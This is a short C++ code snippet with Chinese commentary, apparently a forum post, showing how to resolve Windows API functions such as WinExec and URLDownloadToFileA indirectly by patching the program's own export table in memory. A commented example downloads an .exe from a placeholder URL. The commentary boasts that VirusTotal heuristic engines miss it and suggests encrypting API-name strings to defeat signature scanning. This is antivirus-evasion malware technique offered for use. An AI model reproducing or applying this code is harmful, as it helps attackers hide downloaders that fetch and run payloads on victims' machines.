extern "C" __declspec(dllexport) CHAR szFile[100] = {0}; ULONG __stdcall xGetProc( LPCSTR lpszDll, LPCSTR lpszFunc) { static CRITICAL_SECTION cs = {0}; HMODULE hSelf = NULL; PIMAGE_DOS_HEADER pDosHead = NULL; PIMAGE_NT_HEADERS pNtHead = NULL; PDWORD pExportSize = NULL; hSelf = GetModuleHandle( NULL); pDosHead = (PIMAGE_DOS_HEADER)hSelf; pNtHead = (PIMAGE_NT_HEADERS)((LPBYTE)pDosHead + pDosHead->e_lfanew); pExportSize = &pNtHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; if ( *pExportSize < 0x80000000) { InitializeCriticalSection( &cs); DWORD oldProtect = NULL; VirtualProtect( pExportSize, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &oldProtect); *pExportSize = 0x80000000; VirtualProtect( pExportSize, sizeof(DWORD), oldProtect, &oldProtect); } EnterCriticalSection( &cs); strcpy_s( szFile, lpszDll); strcat_s( szFile, "."); strcat_s( szFile, lpszFunc); ULONG uRet = (ULONG)GetProcAddress( hSelf, "szFile"); LeaveCriticalSection( &cs); return uRet; }
// xGetProc( "kernel32", "WinExec"); // ((void )((__stdcall *)xGetProc( "urlmon", "URLDownloadToFileA"))(int,char*,char*,int,int)) // (0, "htt://www.123123.com/123.exe", "123.exe", 0, 0); // 。。。。。。。
上面是演示代码
https://www.virustotal.com/zh-cn/
这上面杀毒的启发查毒引擎全查不出来。
当然,有些引擎直接匹配字串“URLDownloadToFileA”之类的 得把字串加密一下。